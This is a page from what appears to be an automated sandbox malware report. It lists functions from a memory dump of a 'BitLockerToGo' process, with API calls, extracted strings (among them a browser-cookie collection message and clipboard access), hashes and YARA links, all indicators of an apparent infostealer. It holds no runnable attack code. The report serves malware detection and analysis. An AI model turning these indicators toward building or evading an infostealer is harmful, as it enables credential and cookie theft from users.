Opcode ID: c4a3f5988eb5d6ca8a1ea06dbc2083f0a18f42a37b7c4f7b504e4230d1de090c
Instruction ID: 3c211ae921e2b81ed6da210f15f88634fe588762a2fc5c641bd684338e04debb
Opcode Fuzzy Hash: c4a3f5988eb5d6ca8a1ea06dbc2083f0a18f42a37b7c4f7b504e4230d1de090c
Instruction Fuzzy Hash: 5E216AB5D886544BD3389730ADC222FB5D7DF85324F18463AEC90C6294DB39CD468A92

Function 02A37EB0 Relevance: 1.6, APIs: 1, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,02A37F62), ref: 02A37F4B

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 48b9f98c17fd01ce6b39f2b3c1ba268faeb44d3f5e342ea340296851fee0833e
Instruction ID: 0ea8fb63193cfe7380dff03463dc1a4be7165e27af85ada6d2f8c994e5c0cffc
Opcode Fuzzy Hash: 48b9f98c17fd01ce6b39f2b3c1ba268faeb44d3f5e342ea340296851fee0833e
Instruction Fuzzy Hash: 7311C8756046418BD310CF18D891B46B7A6EF8A728F38896CE5944B785D732E817CBD4

Function 02A39617 Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE ref: 02A392B8

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: 636b58914c714f165ae7461a1c44e325e477a3219288439fde57563cfb478dcc
Instruction ID: 84e4c7ce093974773d5b173fb3417fe0563ac340380f1b558529fb92bba1cd4a
Opcode Fuzzy Hash: 636b58914c714f165ae7461a1c44e325e477a3219288439fde57563cfb478dcc
Instruction Fuzzy Hash: BE1136BCC95148EFC741AF20FE014647AEBAB8A70A7840DA5F81592511EF37D43A8F65

Function 02A107B1 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 02A107B9

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID: DirectorySystem
String ID:
API String ID: 2188284642-0
Opcode ID: 08f5c60acf470746a449bace876c2058c48a0b5e4331013c2165ec6fe70c3a7b
Instruction ID: 54df75715524655e1f419dec42d3d259024a8dd0c401d1074a24bb1ec2261f93
Opcode Fuzzy Hash: 08f5c60acf470746a449bace876c2058c48a0b5e4331013c2165ec6fe70c3a7b
Instruction Fuzzy Hash: E0F046F6D485544BD33893309DC112FB2D7EF89228F19462AEC51CA280DB39CC428EA2

Function 02A31FBA Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 02A31FDA

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 04cc30a39f37dd29aaaa4ab27c5f4116940f5323f730b87abe91bf904c4bcab5
Instruction ID: fd55b50ebf72c041de5c7f4cdb3049b682729edf1931edfb264dcf78aa753ec9
Opcode Fuzzy Hash: 04cc30a39f37dd29aaaa4ab27c5f4116940f5323f730b87abe91bf904c4bcab5
Instruction Fuzzy Hash: 53E04F7A1015028FC310EF78D69065ABBE2FFC4304F258928D89947344D735F856CF92

Function 02A37E92 Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 02A37E96

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 843cb7da03fc5d88cfe4f56040a6287f0f34c4a27ab18e158407f970f497d75f
Instruction ID: aef11b2a9e6ef3271d37efc332d2b49b758c0157484442b6b338df62924bd76b
Opcode Fuzzy Hash: 843cb7da03fc5d88cfe4f56040a6287f0f34c4a27ab18e158407f970f497d75f
Instruction Fuzzy Hash: 9BA0127098420069D018DA104C00F31925C9B8BB01F101408940852081C912D4004014

Non-executed Functions

Function 02A2F370 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 172clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 02A2F3C4
GetWindowLongW.USER32 ref: 02A2F3EF
GetClipboardData.USER32 ref: 02A2F401
CloseClipboard.USER32 ref: 02A2F54D

Strings

C, xrefs: 02A2F494

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID: Clipboard$CloseDataLongOpenWindow
String ID: C
API String ID: 1647500905-1037565863
Opcode ID: 09a5f7dffd635b16a462008eb55fc7a73644364f60d1e9e5083e238f686f5e0a
Instruction ID: 5f479acdd3f3fced87641ea4acee2a7418dbe890de0235cf9961ca4575151a02
Opcode Fuzzy Hash: 09a5f7dffd635b16a462008eb55fc7a73644364f60d1e9e5083e238f686f5e0a
Instruction Fuzzy Hash: 9B614CB4508741CFC720DF3CD484616BBF5AB5A320F148A59E8EACB795DB35E406CB92

Function 02A01051 Relevance: 11.6, Strings: 9, Instructions: 385COMMON

Download Yara Rule

Strings

f, xrefs: 02A01067
., xrefs: 02A01152
6, xrefs: 02A0118C
&, xrefs: 02A011AA
6, xrefs: 02A010E2
g, xrefs: 02A01122
>, xrefs: 02A0110F
d, xrefs: 02A01100
>, xrefs: 02A010F1

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: &$.$6$6$>$>$d$f$g
API String ID: 0-3672295413
Opcode ID: 3b3920bd3034ffba09380ed854d05ed78fffe247f815ca09b07bb6dcd15cf414
Instruction ID: df71ee27fc9cd0ffe821735683f81dc3dfe4b760433f974c4aff5c80cb9ea65c
Opcode Fuzzy Hash: 3b3920bd3034ffba09380ed854d05ed78fffe247f815ca09b07bb6dcd15cf414
Instruction Fuzzy Hash: 0AD1077999C291CFD3048F28E4622A5BBE0FB96341F490DADD4D9822C1DB3AC1A6CF51

Function 02A01EB0 Relevance: 10.6, Strings: 8, Instructions: 594COMMON

Download Yara Rule

Strings

false, xrefs: 02A02041
null, xrefs: 02A0215E
{, xrefs: 02A02215
0, xrefs: 02A01F53
., xrefs: 02A01F7E
., xrefs: 02A01F59
true, xrefs: 02A02029
[, xrefs: 02A02118

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: .$.$0$[$false$null$true${
API String ID: 0-1639024219
Opcode ID: 8b5d825f6c6551e08b692488428dfbf4b8d9fb774f0fe60aaa2f85997bf061a4
Instruction ID: d1a4025dea1dbdfb305e7e390b565a91033530ff45ff36df0714d3a889de34ce
Opcode Fuzzy Hash: 8b5d825f6c6551e08b692488428dfbf4b8d9fb774f0fe60aaa2f85997bf061a4
Instruction Fuzzy Hash: D80226B0A403069BE7105F25FDD876ABBE9AF44348F044539EC8A872C2EF35E514CB96

Function 02A0BD80 Relevance: 8.0, Strings: 6, Instructions: 473COMMON

Download Yara Rule

Strings

uw, xrefs: 02A0BF81
yz, xrefs: 02A0BE72
m)H+, xrefs: 02A0BEEB
n=q?, xrefs: 02A0BECD
d5`7, xrefs: 02A0BEE1
X9n;, xrefs: 02A0BEC3

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: X9n;$d5`7$m)H+$n=q?$yz$uw
API String ID: 0-2790254193
Opcode ID: b5548c9f80eff8b81d8b7b06320549dbf4e496f207136bc986f0d0838e413c83
Instruction ID: aefb95ff344a3c3f54ad8f8d38e2fd5104970b9164c26a50b442033e50a8d267
Opcode Fuzzy Hash: b5548c9f80eff8b81d8b7b06320549dbf4e496f207136bc986f0d0838e413c83
Instruction Fuzzy Hash: 351245B5500B41DFD3248F26D891B97BBE2FB88314F108E2DD5AA8BA90DB75E456CF40

Function 02A185D0 Relevance: 7.8, Strings: 6, Instructions: 288COMMON

Download Yara Rule

Strings

#;~#, xrefs: 02A187A7
=& s, xrefs: 02A1879F
40z4, xrefs: 02A187AF
r, xrefs: 02A187E6
bm'3, xrefs: 02A18818
4$$(, xrefs: 02A18797

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: #;~#$4$$($40z4$=& s$bm'3$r
API String ID: 0-1136624806
Opcode ID: 2d6256ed1e102106f78225bfc3f47f54ee423b3e03970849774b210b8419325c
Instruction ID: 735b66d00f72cfea0bdf0c3978bf1495121e1ffdb2ed71339809a5bce762c1cb
Opcode Fuzzy Hash: 2d6256ed1e102106f78225bfc3f47f54ee423b3e03970849774b210b8419325c
Instruction Fuzzy Hash: 4DA1907160D3918FE729CF24C4D07AABBE2AF96318F18495DD4D54B381CB3A9406CB97

Function 02A21AAF Relevance: 6.4, Strings: 5, Instructions: 167COMMON

Download Yara Rule

Strings

|~}x, xrefs: 02A21C5E
~pv~, xrefs: 02A21C74
afdx, xrefs: 02A21C48
o3jg, xrefs: 02A21C7F
mfgs, xrefs: 02A21C3D

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: afdx$mfgs$o3jg$|~}x$~pv~
API String ID: 0-954730600
Opcode ID: 0aaf328b2db3e938eaaaff79852de80170ab9183d51e0978844bd30fe6a6041b
Instruction ID: d766ec24b42df9b934ee7debfacb1370f2445169f0a3b2d4df1d588fc8dd2338
Opcode Fuzzy Hash: 0aaf328b2db3e938eaaaff79852de80170ab9183d51e0978844bd30fe6a6041b
Instruction Fuzzy Hash: EA51D3769083608BD7348F18C8917ABB7F1FF95354F15892DD5CD8B242EB389809CB96

Function 02A14F7A Relevance: 5.6, Strings: 4, Instructions: 616COMMON

Download Yara Rule

Strings

~M&K, xrefs: 02A15528
<I"W, xrefs: 02A154E5
TU, xrefs: 02A154ED
1;, xrefs: 02A152EA, 02A15298

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 1;$<I"W$TU$~M&K
API String ID: 0-1468034955
Opcode ID: 115f51a18b96012be38f6921417e7958efaab1e2eba1d03a9c67309f7c5b67a5
Instruction ID: d98386e818f9028e05fc8da9a6835fc808f50dab588638f622d35bd394e4babc
Opcode Fuzzy Hash: 115f51a18b96012be38f6921417e7958efaab1e2eba1d03a9c67309f7c5b67a5
Instruction Fuzzy Hash: 50129775A083419BD728CF24C890B6BB7E2FFC5324F484D2DE8858B291EB75D945CB92

Function 02A09890 Relevance: 5.2, Strings: 4, Instructions: 247COMMON

Download Yara Rule

Strings

D@VB, xrefs: 02A09A17
T, xrefs: 02A098A9
ek, xrefs: 02A098A2
V#M, xrefs: 02A09A07

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: D@VB$T$V#M$ek
API String ID: 0-1646848610
Opcode ID: 10973985979f5883d4f98b21bf0dad139d92a3466a8823947a0b118226314aee
Instruction ID: 44790a5d3a9877c15422d8b05e439fccb7f126c929aebf568f4965694221e70d
Opcode Fuzzy Hash: 10973985979f5883d4f98b21bf0dad139d92a3466a8823947a0b118226314aee
Instruction Fuzzy Hash: 5B81BF715093918BD311CF26C09074BFFE2AFD6765F188A8CE4C42B39AC7359946CB86

Function 02A240B7 Relevance: 4.2, Strings: 3, Instructions: 466COMMON

Download Yara Rule

Strings

TDK^, xrefs: 02A240CF
[DTJ, xrefs: 02A240BA
GLDO, xrefs: 02A240DD

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: GLDO$TDK^$[DTJ
API String ID: 0-125455974
Opcode ID: 45e8d9d77771fa1052175e8a41be58b52d2ea3f3c4b7e1f2770692abec278ff6
Instruction ID: a1011efe427187b74537b134c61dd614f072bb4da91242a0cf02f9ef4ba1ba12
Opcode Fuzzy Hash: 45e8d9d77771fa1052175e8a41be58b52d2ea3f3c4b7e1f2770692abec278ff6
Instruction Fuzzy Hash: A4F18F75600B118FC334CF29D890666B7F2FF89314B198A2DD5AA8BB91DB35F849CB50

Function 02A0FDE3 Relevance: 4.0, Strings: 3, Instructions: 294COMMON

Download Yara Rule

Strings

[info] collected cookies file of the chromium-based browser, xrefs: 02A0FE9F
D, xrefs: 02A10176
Y, xrefs: 02A0FE1C

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: D$[info] collected cookies file of the chromium-based browser$Y
API String ID: 0-2458585964
Opcode ID: ca36dcf738120837e416762ee6ee3c9c5f373bbe9f7e45afcaa228cf7f543e45
Instruction ID: 25050c57c535d94389c426558c3922bb45fb26522506fd8c1ceb970251a9493c
Opcode Fuzzy Hash: ca36dcf738120837e416762ee6ee3c9c5f373bbe9f7e45afcaa228cf7f543e45
Instruction Fuzzy Hash: 91C143B05583819BE328DF10D8A0B6FBBE2FFC1754F50490CE5C90B291CBB99849CB96

Function 02A05920 Relevance: 3.4, Strings: 2, Instructions: 867COMMON

Download Yara Rule

Strings

0, xrefs: 02A062F9
8, xrefs: 02A062F1

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 953fe0f36bbe218e7026940dbea6ad5420f02d4ea65d6e11216de0526fbf22e7
Instruction ID: be816165d7670bddd10ffa8f18e8bf2b63088f4e49316cc2955703f85c37bd77
Opcode Fuzzy Hash: 953fe0f36bbe218e7026940dbea6ad5420f02d4ea65d6e11216de0526fbf22e7
Instruction Fuzzy Hash: 5C728971A083409FD724CF19D880B5ABBE2BF88318F48891DF9998B391DB75D944CF92

Function 02A3B1D0 Relevance: 1.9, Strings: 1, Instructions: 689COMMON

Download Yara Rule

Strings

vA@C, xrefs: 02A3B216

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: vA@C
API String ID: 0-31758468
Opcode ID: a667a405d2e84ea8914a4860e2493d4c28d2723731dd8ab77d0548246ffcc2cb
Instruction ID: ff9343edfb481d5d0f291d274e6b97b15cffae381eab07166e0a8f42cbd5814f
Opcode Fuzzy Hash: a667a405d2e84ea8914a4860e2493d4c28d2723731dd8ab77d0548246ffcc2cb
Instruction Fuzzy Hash: BD22CE35A09251CFC708CF28D89066AB7F2FBC9318F098D6DE99597351CB31E926CB81

Function 02A1DFB0 Relevance: 1.7, APIs: 1, Instructions: 249comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(02A3F748,00000000,00000001,02A3F738), ref: 02A1DFD9

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: df6a0a0c6e868d63249da9f50317d08fa5697b75a1a2dea6b239c54ab9c1705f
Instruction ID: 78e91bb599af06660b3b4c7e5c140e94e568bda10950aae6f61525c769e6ca0b
Opcode Fuzzy Hash: df6a0a0c6e868d63249da9f50317d08fa5697b75a1a2dea6b239c54ab9c1705f
Instruction Fuzzy Hash: A951BCB1A502009BEB249B24CD86B7373B5FFA5368F084558FE858B390EB76E844C765

Function 02A01566 Relevance: 1.7, Strings: 1, Instructions: 421COMMON

Download Yara Rule

Strings

, xrefs: 02A0173D

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: e182f00c319e48e035d4b0bc7a3b73a9160479e10585f964332fa261ef2f1b40
Instruction ID: 7fec8a1d1bc288323989fac67d1e21444f8340274bb2dc34aa78d868bf726b0d
Opcode Fuzzy Hash: e182f00c319e48e035d4b0bc7a3b73a9160479e10585f964332fa261ef2f1b40
Instruction Fuzzy Hash: 47E1D77E95C291CFD3088F24E4613667BE0FB9A341F494DADD1C983281DB3AD5A2CB51

Function 02A2143B Relevance: 1.7, Strings: 1, Instructions: 412COMMON

Download Yara Rule

Strings

gxyz, xrefs: 02A219AE

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: gxyz
API String ID: 0-2474275795
Opcode ID: dabf74cd39593cb316df2b02b7e1bcff3cd19c93b501e60c24bedc6dd7bd50a6
Instruction ID: 740f147b9a2a79f8e3ad7c3bbc92da5266e0f1ccaf5a8b872a73362d846f9103
Opcode Fuzzy Hash: dabf74cd39593cb316df2b02b7e1bcff3cd19c93b501e60c24bedc6dd7bd50a6
Instruction Fuzzy Hash: 4DE19E75908362CBC328CF18C4906AAB3F2FFD9744F55896CD4CA87251EB35D959CB82

Function 02A27140 Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

", xrefs: 02A27458

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 67417c906a09afae9669f2acc98fb53cf0883053204df2d0a195b42da69b657e
Instruction ID: da0fadf963cbfbfafeacbfafd818cea3459c23fcaf7c3732f6bfa1731b42e14c
Opcode Fuzzy Hash: 67417c906a09afae9669f2acc98fb53cf0883053204df2d0a195b42da69b657e
Instruction Fuzzy Hash: A5C1E771A483215FD715CF2C8C80B6BF7EAAF84354F08895DE8998B391EB34DA49C791

Function 02A1BD90 Relevance: 1.6, Strings: 1, Instructions: 394COMMON

Download Yara Rule

Strings

HI, xrefs: 02A1BEDA

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: HI
API String ID: 0-1987653318
Opcode ID: 22149963f2ef524b463da07670c68972d671a0bde3235f9a26f6afb977fb1181
Instruction ID: 939c06047bcc808a3332b316c32e9b3ef92369d4667c7ff921ffeff7fd1ec026
Opcode Fuzzy Hash: 22149963f2ef524b463da07670c68972d671a0bde3235f9a26f6afb977fb1181
Instruction Fuzzy Hash: 9FB1CF715083108BC714CF18C89176BB7F2EF95368F188A1DE9958B391EB35E945CBA2

Function 02A1E80E Relevance: 1.6, Strings: 1, Instructions: 389COMMON

Download Yara Rule

Strings

[info] collected cookies file of the chromium-based browser, xrefs: 02A1E9EF

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: [info] collected cookies file of the chromium-based browser
API String ID: 0-3235166063
Opcode ID: 4bc2f385423615006d478c2c9e2dca62dce8ee2bd11bddfe1cf045c2ea184127
Instruction ID: 464f0017f350767d5c319a0286197d373a1093b4570b939b7948a19acc7facd1
Opcode Fuzzy Hash: 4bc2f385423615006d478c2c9e2dca62dce8ee2bd11bddfe1cf045c2ea184127
Instruction Fuzzy Hash: A9D16D75A083519FD329CF18C49072AFBE1FBC5364F18892CE9958B391DB75D842CB82

Function 02A275E0 Relevance: 1.5, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

", xrefs: 02A278F1

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: bb4325f45638170b919d545a65d4429e963da34ce308d6dcb52940f6c5e66227
Instruction ID: a7c0cbab12ab0941c7ee310c5c4cc98df5c28527c3d031074a181fa9464637fd
Opcode Fuzzy Hash: bb4325f45638170b919d545a65d4429e963da34ce308d6dcb52940f6c5e66227
Instruction Fuzzy Hash: 7DA194326083268FC714CF2DCD8061AF7E2ABC9724F19C92DE49897395DB74DE498B81

Function 02A3CAB0 Relevance: 1.5, Strings: 1, Instructions: 283COMMON

Download Yara Rule

Strings

R5Z3, xrefs: 02A3CAB5

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: R5Z3
API String ID: 0-2640636806
Opcode ID: aa30d2c59da2619993602a0d4c0f1e66c1d04f7c1379fef2d46dc85f1457c8e7
Instruction ID: 0ffa43246414be23bbd75bfd12f56d2d3aec1e1128b5013d5346ec117482cc05
Opcode Fuzzy Hash: aa30d2c59da2619993602a0d4c0f1e66c1d04f7c1379fef2d46dc85f1457c8e7
Instruction Fuzzy Hash: AE919C756043029FC715CF18D890A6AB7F2FF88764F15891DF985AB2A1EB30EC51CB81

Function 02A06CA0 Relevance: 1.5, Strings: 1, Instructions: 262COMMON

Download Yara Rule

Strings

,, xrefs: 02A06DF3

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 734697f72093dec697da5c16b79b09f48496df7dbee9d0dddb6af60765f6d485
Instruction ID: 3e281e4e36af98af6de79093612d90f68a6afe3179723f17e74cc78f5de2df6b
Opcode Fuzzy Hash: 734697f72093dec697da5c16b79b09f48496df7dbee9d0dddb6af60765f6d485
Instruction Fuzzy Hash: 09B15A711097819FD314CF28D88475BFBE1AF99708F444A2DF49897782C771EA28CB96

Function 02A15799 Relevance: 1.5, Strings: 1, Instructions: 202COMMON

Download Yara Rule

Strings

D, xrefs: 02A15A49

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: 3fbdec7661b80a33721877fe397b0cda8f58af9b314b0c666dd9eb24287e9c6f
Instruction ID: b18e6eab99dfaaa630594da8a2435af947f7081be4e0cf59e2f6ab493182f614
Opcode Fuzzy Hash: 3fbdec7661b80a33721877fe397b0cda8f58af9b314b0c666dd9eb24287e9c6f
Instruction Fuzzy Hash: 7471E1B05083818BD324CF25C8A175BBBF2FF82758F148D1CE5A58B290D7B99809CB86

Function 02A3AD00 Relevance: 1.0, Instructions: 992COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d46a4a93a4da6cd2e731796d7b578bb59afd0a934d56a364cf68c9d5c7b6105b
Instruction ID: fd361eda4b78c9c894776c92b3e72e137c2e2dd8c232397fdeb0e3806f882a0d
Opcode Fuzzy Hash: d46a4a93a4da6cd2e731796d7b578bb59afd0a934d56a364cf68c9d5c7b6105b
Instruction Fuzzy Hash: ED52D03AA09251CFC708CF28D49065AB7F2FBCA314F098D6DE99997355CB31E816CB81

Function 02A3AE80 Relevance: .9, Instructions: 856COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3d8a40bbcba3dd860613efe2d28db23a97342c344f86a68f51e0ad8922ec3d9
Instruction ID: cd36e0f9673c53763ded9c901a2f88e6fe90397d5816dda83c69f4b16f344559
Opcode Fuzzy Hash: b3d8a40bbcba3dd860613efe2d28db23a97342c344f86a68f51e0ad8922ec3d9
Instruction Fuzzy Hash: 1042BD39A09251CFC708CF28D49065AB7E2FBC9314F098D6DE99597355CB32E866CB81

Function 02A08330 Relevance: .8, Instructions: 826COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fbc53842b38508550f385baeca4452031de9cb3934d8a64bbdef5fb7343e695
Instruction ID: 0138a215b3ce949da8413cb4cb4725fd781463df2c20bad4194b4aa57d3fae77
Opcode Fuzzy Hash: 4fbc53842b38508550f385baeca4452031de9cb3934d8a64bbdef5fb7343e695
Instruction Fuzzy Hash: 5342B1316087118FC724DF58E8C427AB3E1FFC4319F194A2DD996872C5EB39A855CB8A

Function 02A3B090 Relevance: .7, Instructions: 744COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dfc927db1e52871d316045f0cb878f0e77d1d1c38f9c76a91fec734e2e80168
Instruction ID: b216fceb81f2503d9d063db677db56513f2a986bbf3ee1f57482b7ea42625a6f
Opcode Fuzzy Hash: 6dfc927db1e52871d316045f0cb878f0e77d1d1c38f9c76a91fec734e2e80168
Instruction Fuzzy Hash: EF22DF39A09251CFC708CF28D49066AB7F2FBC9318F098D6DE99597351CB31E966CB81

Function 02A03990 Relevance: .7, Instructions: 738COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

